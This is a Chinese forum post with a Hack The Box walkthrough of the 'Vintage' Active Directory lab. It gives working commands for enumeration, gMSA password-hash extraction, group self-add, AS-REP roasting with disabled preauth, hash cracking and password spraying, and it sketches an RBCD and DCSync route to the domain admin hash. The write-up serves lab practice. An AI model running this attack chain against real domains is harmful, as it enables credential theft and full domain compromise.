IT评测·应用市场-qidao123.com技术社区

标题: HTB打靶记录-Vintage [打印本页]

---

作者: 用多少眼泪才能让你相信    时间: 2025-4-8 14:40
标题: HTB打靶记录-Vintage
信息收集

nmap -sV -sC -O 10.10.11.45

1. Nmap scan report for 10.10.11.45
2. Host is up (2.1s latency).
3. Not shown: 988 filtered tcp ports (no-response)
4. PORT     STATE SERVICE       VERSION
5. 53/tcp   open  domain        Simple DNS Plus
6. 88/tcp   open  kerberos-sec?
7. 135/tcp  open  msrpc         Microsoft Windows RPC
8. 139/tcp  open  netbios-ssn?
9. 389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
10. 445/tcp  open  microsoft-ds?
11. 464/tcp  open  kpasswd5?
12. 593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
13. 636/tcp  open  tcpwrapped
14. 3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
15. 3269/tcp open  tcpwrapped
16. 5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
17. |_http-title: Not Found
18. |_http-server-header: Microsoft-HTTPAPI/2.0
19. 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
20. SF-Port139-TCP:V=7.95%I=7%D=4/7%Time=67F39479%P=x86_64-pc-linux-gnu%r(GetR
21. SF:equest,5,"\x83\0\0\x01\x8f");
22. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
23. OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
24. No OS matches for host
25. Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
27. Host script results:
28. | smb2-time:
29. |   date: 2025-04-07T08:43:58
30. |_  start_date: N/A
31. |_clock-skew: -19m07s
32. | smb2-security-mode:
33. |   3:1:1:
34. |_    Message signing enabled and required
36. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
37. Nmap done: 1 IP address (1 host up) scanned in 370.27 seconds

复制代码

题目描述给了一个凭证：P.Rosa:Rosaisbest123
GetTGT

impacket-getTGT 'vintage.htb/P.Rosa:Rosaisbest123' -dc-ip 10.10.11.45
记得要faketime
export KRB5CCNAME=P.Rosa.ccache
ldap收集信息

smb走不通，通过ldap来收集，nxc ldap 10.10.11.45 -d vintage.htb -k --use-kcache --users

1. Administrator
2. Guest
3. krbtgt
4. M.Rossi
5. R.Verdi
6. L.Bianchi
7. G.Viola
8. C.Neri
9. P.Rosa
10. svc_sql
11. svc_ldap
12. svc_ark
13. C.Neri_adm
14. L.Bianchi_adm

复制代码

ldap收集不全。改用smb
nxc smb 10.10.11.45 -d vintage.htb -u P.Rosa -k --use-kcache --rid-brute | grep "SidTypeUser"

1. Administrator
2. Guest
3. krbtgt
4. DC01$
5. gMSA01$
6. FS01$
7. M.Rossi
8. R.Verdi
9. L.Bianchi
10. G.Viola
11. C.Neri
12. P.Rosa
13. svc_sql
14. svc_ldap
15. svc_ark
16. C.Neri_adm
17. L.Bianchi_adm

复制代码

常规手法都测试了，一点信息收集不到了，直接bloodhound看有没有突破口
bloodhound

faketime "$(ntpdate -q 10.10.11.45 | grep -oP '\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}')" bloodhound-python -d vintage.htb -u P.Rosa -k -no-pass -ns 10.10.11.45 -c all --zip
FS01属于PRE-WINDOWS 2000 Compatible Access组，可以pre2k打一下试试

pre2k

pre2k unauth -d vintage.htb -dc-ip 10.10.11.45 -save -inputfile user.txt

继续查看FS01的域关系网，可以从msDS-ManagedPassword读取GMSA01的密码hash

GMSA

bloodyAD --host dc01.vintage.htb -d vintage.htb --dc-ip 10.10.11.45 -k get object 'GMSA01$' --attr msDS-ManagedPassword

获取TGT，impacket-getTGT vintage.htb/'gmsa01$' -hashes :b3a15bbdfb1c53238d4b50ea2c4d1178  -dc-ip 10.10.11.45
查看gmsa01的域关系网，可以将gmsa01加入SERVICEMANAGES组

AddSelf/GerenicWrite

bloodyAD --host "dc01.vintage.htb" -d "vintage.htb" --kerberos --dc-ip 10.10.11.45 -u 'GMSA01$' -k  add groupMember "CN=SERVICEMANAGERS,OU=PRE-MIGRATION,DC=VINTAGE,DC=HTB"  'GMSA01$'
查看是否添加乐成
bloodyAD --host "dc01.vintage.htb" -d "vintage.htb" --kerberos --dc-ip 10.10.11.45 -u 'GMSA01$' -k  get object "CN=SERVICEMANAGERS,OU=PRE-MIGRATION,DC=VINTAGE,DC=HTB" --attr member

查看SERVICEMANAGES组的域关系网

对这三个用户有GerenicAll权限，将这三个用户的预认证关闭，打一个AS-REQ Roasting
bloodyAD --host dc01.vintage.htb -d vintage.htb --dc-ip 10.10.11.45 -k add uac SVC_SQL -f DONT_REQ_PREAUTH
svc_sql用户未启用，启用一下，删除UAC里的ACCOUNTDISABLE就行了
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k remove uac svc_sql -f ACCOUNTDISABLE
打AS-REQ Roasting
impacket-GetNPUsers vintage/ -request -format hashcat -usersfile user.txt -outputfile np.txt -dc-ip 10.10.11.45 -dc-host dc01.vintage.htb
爆破svc_sql的密码
john np.txt -w=/usr/share/wordlists/rockyou.txt
拿到密码：???????
用这个密码喷洒一下其他用户
kerbrute passwordspray -d vintage.htb user.txt
打中C.Neri，这里应该winrm能够连上C.Neri，但我这里死活连不上，就说一下后面的攻击思路，C.Neri也属于SERVICEMANAGES组，以是可以通过svc_sql打一个RBCD，我们要挑选高权限的用户来伪造，发现L.Bianchi_adm对域控有DCSync权限，那么就可以通过RBCD来获取L.Bianchi_adm的TGT，然后打域控的DCSync获取域管理员的NTLM Hash

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。

---

欢迎光临 IT评测·应用市场-qidao123.com技术社区 (https://dis.qidao123.com/)

Powered by Discuz! X3.4